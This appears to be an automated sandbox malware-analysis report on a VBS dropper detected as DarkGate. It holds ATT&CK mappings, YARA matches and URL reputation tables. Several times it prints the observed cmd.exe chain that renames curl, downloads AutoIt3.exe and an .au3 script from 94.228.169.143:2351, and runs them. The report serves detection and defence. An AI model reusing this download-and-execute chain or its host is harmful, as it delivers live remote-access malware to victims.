Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B3F2D mov eax, dword ptr fs:[00000030h]	6_3_042B3F2D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332F12 mov eax, dword ptr fs:[00000030h]	6_3_04332F12
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4F60 mov eax, dword ptr fs:[00000030h]	6_3_042A4F60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320F67 mov eax, dword ptr fs:[00000030h]	6_3_04320F67
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345F5B mov eax, dword ptr fs:[00000030h]	6_3_04345F5B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345F5B mov eax, dword ptr fs:[00000030h]	6_3_04345F5B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B3FA2 mov eax, dword ptr fs:[00000030h]	6_3_042B3FA2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042CDFA0 mov ecx, dword ptr fs:[00000030h]	6_3_042CDFA0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433CF80 mov eax, dword ptr fs:[00000030h]	6_3_0433CF80
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433CF80 mov eax, dword ptr fs:[00000030h]	6_3_0433CF80
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435BFF0 mov eax, dword ptr fs:[00000030h]	6_3_0435BFF0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435BFF0 mov eax, dword ptr fs:[00000030h]	6_3_0435BFF0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342FC0 mov eax, dword ptr fs:[00000030h]	6_3_04342FC0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342FC0 mov eax, dword ptr fs:[00000030h]	6_3_04342FC0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436CFCD mov eax, dword ptr fs:[00000030h]	6_3_0436CFCD
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436CFCD mov eax, dword ptr fs:[00000030h]	6_3_0436CFCD
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042BC820 mov eax, dword ptr fs:[00000030h]	6_3_042BC820
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DE838 mov eax, dword ptr fs:[00000030h]	6_3_042DE838
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]	6_3_0433281F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]	6_3_0433281F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]	6_3_0433281F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]	6_3_0433281F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]	6_3_0433281F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]	6_3_0434C860
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]	6_3_0434C860
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]	6_3_0434C860
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F844 mov eax, dword ptr fs:[00000030h]	6_3_0432F844
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434A880 mov eax, dword ptr fs:[00000030h]	6_3_0434A880
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]	6_3_042B78EA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]	6_3_042B78EA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]	6_3_042B78EA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]	6_3_042B78EA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043458F0 mov eax, dword ptr fs:[00000030h]	6_3_043458F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043458F0 mov eax, dword ptr fs:[00000030h]	6_3_043458F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D08E0 mov edi, dword ptr fs:[00000030h]	6_3_042D08E0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043708D5 mov eax, dword ptr fs:[00000030h]	6_3_043708D5
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043708D5 mov eax, dword ptr fs:[00000030h]	6_3_043708D5
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]	6_3_043238D6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]	6_3_043238D6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]	6_3_043238D6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F8D9 mov eax, dword ptr fs:[00000030h]	6_3_0432F8D9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0437B8D9 mov eax, dword ptr fs:[00000030h]	6_3_0437B8D9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0437B8D9 mov eax, dword ptr fs:[00000030h]	6_3_0437B8D9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043388C0 mov eax, dword ptr fs:[00000030h]	6_3_043388C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436D934 mov eax, dword ptr fs:[00000030h]	6_3_0436D934
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E933 mov eax, dword ptr fs:[00000030h]	6_3_0435E933
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DB921 mov eax, dword ptr fs:[00000030h]	6_3_042DB921
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A3915 mov eax, dword ptr fs:[00000030h]	6_3_042A3915
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DB97F mov ecx, dword ptr fs:[00000030h]	6_3_042DB97F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DB97F mov eax, dword ptr fs:[00000030h]	6_3_042DB97F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DB97F mov eax, dword ptr fs:[00000030h]	6_3_042DB97F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04348958 mov esi, dword ptr fs:[00000030h]	6_3_04348958
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]	6_3_04335942
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]	6_3_04335942
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]	6_3_04335942
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]	6_3_04335942
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435A9A9 mov eax, dword ptr fs:[00000030h]	6_3_0435A9A9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435A9A9 mov eax, dword ptr fs:[00000030h]	6_3_0435A9A9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A7A31 mov eax, dword ptr fs:[00000030h]	6_3_042A7A31
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A7A31 mov eax, dword ptr fs:[00000030h]	6_3_042A7A31
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]	6_3_04324A2E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]	6_3_04324A2E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]	6_3_04324A2E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323A0D mov eax, dword ptr fs:[00000030h]	6_3_04323A0D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323A0D mov eax, dword ptr fs:[00000030h]	6_3_04323A0D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0437BA75 mov eax, dword ptr fs:[00000030h]	6_3_0437BA75
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0437BA75 mov eax, dword ptr fs:[00000030h]	6_3_0437BA75
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D2A60 mov eax, dword ptr fs:[00000030h]	6_3_042D2A60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D2A60 mov eax, dword ptr fs:[00000030h]	6_3_042D2A60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338A60 mov eax, dword ptr fs:[00000030h]	6_3_04338A60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338A60 mov eax, dword ptr fs:[00000030h]	6_3_04338A60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D6A45 mov eax, dword ptr fs:[00000030h]	6_3_042D6A45
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4A50 mov ecx, dword ptr fs:[00000030h]	6_3_042A4A50
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D0A50 mov eax, dword ptr fs:[00000030h]	6_3_042D0A50
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04366A49 mov eax, dword ptr fs:[00000030h]	6_3_04366A49
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04366A49 mov ecx, dword ptr fs:[00000030h]	6_3_04366A49
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FAB0 mov eax, dword ptr fs:[00000030h]	6_3_0432FAB0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C9AAF mov eax, dword ptr fs:[00000030h]	6_3_042C9AAF
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432EAB6 mov eax, dword ptr fs:[00000030h]	6_3_0432EAB6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432EAB6 mov eax, dword ptr fs:[00000030h]	6_3_0432EAB6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432EAB6 mov ecx, dword ptr fs:[00000030h]	6_3_0432EAB6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04339AB9 mov eax, dword ptr fs:[00000030h]	6_3_04339AB9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04353ABB mov eax, dword ptr fs:[00000030h]	6_3_04353ABB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04353ABB mov eax, dword ptr fs:[00000030h]	6_3_04353ABB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]	6_3_0434FAAE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328A80 mov eax, dword ptr fs:[00000030h]	6_3_04328A80
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]	6_3_04326AFC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]	6_3_04326AFC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]	6_3_04326AFC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]	6_3_042A4AF9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]	6_3_042A4AF9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]	6_3_042A4AF9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345AEC mov eax, dword ptr fs:[00000030h]	6_3_04345AEC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345AEC mov eax, dword ptr fs:[00000030h]	6_3_04345AEC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435DAE9 mov eax, dword ptr fs:[00000030h]	6_3_0435DAE9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323ADF mov eax, dword ptr fs:[00000030h]	6_3_04323ADF
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04359AC8 mov eax, dword ptr fs:[00000030h]	6_3_04359AC8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04359AC8 mov eax, dword ptr fs:[00000030h]	6_3_04359AC8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E0B2F mov eax, dword ptr fs:[00000030h]	6_3_042E0B2F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E0B2F mov eax, dword ptr fs:[00000030h]	6_3_042E0B2F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04337B30 mov eax, dword ptr fs:[00000030h]	6_3_04337B30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433AB37 mov eax, dword ptr fs:[00000030h]	6_3_0433AB37
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]	6_3_04342B3D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]	6_3_04342B3D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]	6_3_04342B3D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04357B20 mov eax, dword ptr fs:[00000030h]	6_3_04357B20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04357B20 mov eax, dword ptr fs:[00000030h]	6_3_04357B20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04353B20 mov eax, dword ptr fs:[00000030h]	6_3_04353B20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04353B20 mov eax, dword ptr fs:[00000030h]	6_3_04353B20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328B10 mov eax, dword ptr fs:[00000030h]	6_3_04328B10
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324B0A mov eax, dword ptr fs:[00000030h]	6_3_04324B0A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324B0A mov ecx, dword ptr fs:[00000030h]	6_3_04324B0A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]	6_3_042A1B65
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]	6_3_042A1B65
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]	6_3_042A1B65
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]	6_3_042A1B65
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]	6_3_042A1B65
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04339B6B mov eax, dword ptr fs:[00000030h]	6_3_04339B6B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D9B54 mov eax, dword ptr fs:[00000030h]	6_3_042D9B54
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D9B54 mov eax, dword ptr fs:[00000030h]	6_3_042D9B54

Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D48630 SetUnhandledExceptionFilter,_set_new_mode,	4_2_00007FF7F8D48630
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D482B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF7F8D482B4
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D48BB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF7F8D48BB4
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D48D54 SetUnhandledExceptionFilter,	4_2_00007FF7F8D48D54

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 94.228.169.143 2351

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -h "user-agent: curl" -o autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & autoit3.exe szkzjr.au3
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -h "user-agent: curl" -o autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & autoit3.exe szkzjr.au3			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3	Jump to behavior

Source: Autoit3.exe, 00000006.00000002.384426094.0000000000366000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\bpzs\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\bpzs\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\bpzs\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\bpzs\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior
Source: C:\bpzs\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D48AA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF7F8D48AA0

Stealing of Sensitive Information

Yara detected DarkGate

Source: Yara match	File source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR

Remote Access Functionality

Yara detected DarkGate

Source: Yara match	File source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR

Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D34958 calloc,calloc,strchr,strncpy,strchr,inet_pton,strncpy,strchr,strtoul,strchr,strtoul,getsockname,WSAGetLastError,free,free,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,_cwprintf_s_l,_cwprintf_s_l,	4_2_00007FF7F8D34958
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D323A0 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	4_2_00007FF7F8D323A0
Source: C:\bpzs\bpzs.exe	Code function: 4_2_00007FF7F8D17500 strncmp,strncmp,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	4_2_00007FF7F8D17500

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Command and Scripting Interpreter	Path Interception	112 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	112 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	221 Scripting	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	113 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1.vbs	3%	ReversingLabs	Win32.Trojan.Generic
1.vbs	12%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\bpzs\Autoit3.exe	0%	ReversingLabs
C:\bpzs\Autoit3.exe	3%	Virustotal	Browse
C:\bpzs\bpzs.exe	0%	ReversingLabs
C:\bpzs\bpzs.exe	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://94.228.169.143:2351Cw	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/bpzszuqi~	0%	Avira URL Cloud	safe
http://darkgate.com	0%	Avira URL Cloud	safe
http://94.228.169.143:2351	0%	Avira URL Cloud	safe
https://go.mic	0%	Avira URL Cloud	safe
http://94.228.169.143:2351pace	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/msibpzszuqiqb	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/	0%	Avira URL Cloud	safe
http://darkgate.comU	0%	Avira URL Cloud	safe
http://94.228.169.143:2351cm	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/bpzszuqi~	2%	Virustotal		Browse
http://94.228.169.143:2351/	1%	Virustotal		Browse
http://94.228.169.143:2351temkw	0%	Avira URL Cloud	safe
http://darkgate.com	0%	Virustotal		Browse
https://go.microso	0%	Avira URL Cloud	safe
http://go.micr	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/F	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/bpzszuqi	0%	Avira URL Cloud	safe
http://94.228.169.143:2341/msibpzszuqi	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/msibpzszuqi	0%	Avira URL Cloud	safe
http://94.228.169.143:2351	1%	Virustotal		Browse
http://94.228.169.143:2351/bpzszuqi3?	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/tem	0%	Avira URL Cloud	safe
http://94.228.169.143:2351O	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/msibpzszuqi	7%	Virustotal		Browse
http://94.228.169.143:2351tem	0%	Avira URL Cloud	safe
http://94.228.169.143:2351/tem	1%	Virustotal		Browse
http://94.228.169.143:2341/msibpzszuqi	1%	Virustotal		Browse
http://94.228.169.143:2351/bpzszuqi3?	2%	Virustotal		Browse
http://94.228.169.143:2351/bpzszuqi	7%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://94.228.169.143:2351/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.169.143:2351/bpzszuqi	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.169.143:2351/msibpzszuqi	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	Autoit3.exe, 00000006.00000002.384435840.0000000000379000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.dr	false		high
http://94.228.169.143:2351	bpzs.exe, 00000004.00000002.375550889.0000011FBD440000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://darkgate.com	Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.mic	Autoit3.exe	false	Avira URL Cloud: safe	unknown
http://94.228.169.143:2351Cw	bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html	bpzs.exe.2.dr	false		high
http://94.228.169.143:2351/bpzszuqi~	wscript.exe, 00000001.00000003.366674421.00000185DFDE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
